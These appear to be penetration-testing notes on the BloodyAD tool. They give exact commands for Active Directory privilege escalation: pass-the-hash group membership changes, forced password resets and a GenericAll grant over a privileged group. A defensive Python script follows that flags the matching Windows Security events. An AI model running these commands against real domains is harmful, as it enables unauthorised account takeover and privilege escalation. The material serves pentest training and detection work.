BloodyAD

BloodyAD is an Active Directory privilege escalation framework.

BloodyAD can be used as an alternative to PowerView to execute (for example) the following actions:

  • Add member to group (AddMember)

  • Set new password for user (ForceChangePassword)

This works directly from Kali, so you don't need to execute PowerView commands from a compromised host.

Add member to group (pass the hash)

python3 bloodyAD.py --host "192.168.210.10" -d "zsm.local" -u "ZPH-SVRMGMT1$" -p 00000000000000000000000000000000:89d0b56874fAAAAA8bad336a77b8ef2f add groupMember 'GENERAL MANAGEMENT' 'Marcus'

Where -u and -p contain credentials of a compromised machine account.

python3 bloodyAD.py --host "192.168.210.10" -d "zsm.local" -u "JAMIE" -p Password123\! add groupMember 'CA MANAGERS' 'JAMIE'

Force change password

python3 bloodyAD.py --host "192.168.210.10" -d "zsm.local" -u "Marcus" -p Password123 set password Jamie Password123\!

Where -u and -p contain credentials of a compromised user.

Add GenericAll

We grant our user pentest1 GenericAll over the group, authenticating with a pass-the-hash (PTH) attack:

python3 bloodyAD.py --host "10.70.2.21" -d "FAKE.intra" -u "DC01$" -p :73d6af...b3a0d689a add genericAll "ENTERPRISE KEY ADMINS" "pentest1"
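As an added defensive counterpart to the three actions above (this is example code written for these notes, not part of BloodyAD or of the original page): a small Python triage routine over the Windows Security events each action generates. The event IDs (4728/4732/4756 for a member added to a security-enabled group, 4724 for a password reset, 5136 for a directory object modification with the nTSecurityDescriptor attribute) and their field names are the standard ones; the sample events, the SENSITIVE_GROUPS list and the helper names are constructed for the example. The rules key on the two patterns visible in the commands above: a machine account ($) performing the change, and an account adding itself to a group.

```python
"""Triage Windows Security events for the three BloodyAD actions covered above:
group member add, password reset and DACL (GenericAll) change.
Added example: event IDs and field names are the standard Security log ones;
the sample events, SENSITIVE_GROUPS and helper names are constructed."""
from dataclasses import dataclass

# Security log event IDs (built-in Windows auditing).
GROUP_ADD_EVENTS = {4728: "global", 4732: "local", 4756: "universal"}  # member added to security-enabled group
PASSWORD_RESET_EVENT = 4724     # an attempt was made to reset an account's password
OBJECT_MODIFIED_EVENT = 5136    # a directory service object was modified (needs DS Access auditing + SACL)

# Groups whose membership or ACL changes always warrant a high-severity alert (assumption: tune per domain).
SENSITIVE_GROUPS = {
    "DOMAIN ADMINS", "ENTERPRISE ADMINS", "SCHEMA ADMINS", "ADMINISTRATORS",
    "KEY ADMINS", "ENTERPRISE KEY ADMINS", "CA MANAGERS",
}


@dataclass
class Alert:
    severity: str   # "high" or "medium"
    rule: str
    subject: str    # account that performed the change
    target: str     # what was changed


def first_cn(dn: str) -> str:
    """Return the leading CN of a distinguished name ('CN=Marcus,CN=Users,...' -> 'Marcus')."""
    rdn = dn.split(",", 1)[0]
    return rdn.split("=", 1)[1] if "=" in rdn else rdn


def is_machine_account(sam: str) -> bool:
    """Computer accounts end in '$'; they do not normally edit groups or reset passwords."""
    return sam.endswith("$")


def triage(events):
    """Return one Alert per suspicious event, in input order."""
    alerts = []
    for ev in events:
        eid = ev["EventID"]
        subject = ev.get("SubjectUserName", "")
        if eid in GROUP_ADD_EVENTS:
            group = ev["TargetUserName"].upper()          # 47xx: TargetUserName is the group
            member = first_cn(ev.get("MemberName", ""))   # MemberName is the new member's DN
            sev = "high" if group in SENSITIVE_GROUPS else "medium"
            if is_machine_account(subject) or member.lower() == subject.lower():
                sev = "high"   # machine account acting, or an account adding itself
            alerts.append(Alert(sev, f"member-added-{GROUP_ADD_EVENTS[eid]}-group",
                                subject, f"{member} -> {group}"))
        elif eid == PASSWORD_RESET_EVENT:
            target = ev["TargetUserName"]
            if target.lower() != subject.lower():        # reset of someone else's password
                sev = "high" if is_machine_account(subject) else "medium"
                alerts.append(Alert(sev, "password-reset-by-other", subject, target))
        elif eid == OBJECT_MODIFIED_EVENT and ev.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor":
            obj = first_cn(ev["ObjectDN"])               # the object whose DACL/SACL changed
            sev = "high" if obj.upper() in SENSITIVE_GROUPS or is_machine_account(subject) else "medium"
            alerts.append(Alert(sev, "dacl-modified", subject, obj))
    return alerts


# Constructed sample events mirroring the three commands above (not real log captures).
SAMPLE_EVENTS = [
    {"EventID": 4728, "SubjectUserName": "ZPH-SVRMGMT1$", "TargetUserName": "GENERAL MANAGEMENT",
     "MemberName": "CN=Marcus,CN=Users,DC=zsm,DC=local"},
    {"EventID": 4728, "SubjectUserName": "JAMIE", "TargetUserName": "CA MANAGERS",
     "MemberName": "CN=JAMIE,CN=Users,DC=zsm,DC=local"},
    {"EventID": 4724, "SubjectUserName": "Marcus", "TargetUserName": "Jamie"},
    {"EventID": 5136, "SubjectUserName": "DC01$",
     "ObjectDN": "CN=Enterprise Key Admins,CN=Users,DC=FAKE,DC=intra",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 5136, "SubjectUserName": "helpdesk1",
     "ObjectDN": "CN=Printers,OU=Devices,DC=FAKE,DC=intra",
     "AttributeLDAPDisplayName": "description"},   # benign attribute change: no alert
    {"EventID": 4624, "SubjectUserName": "Marcus"},  # ordinary logon: ignored
]

if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print(f"[{a.severity}] {a.rule}: {a.subject} -> {a.target}")
```

Event 5136 only fires when "Audit Directory Service Changes" is enabled and the object (or its parent OU) carries a SACL auditing Write DAC; without that, the GenericAll grant above leaves no 5136 record, which is why the group-membership and password-reset events are the more reliable signal in a default-configured domain.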
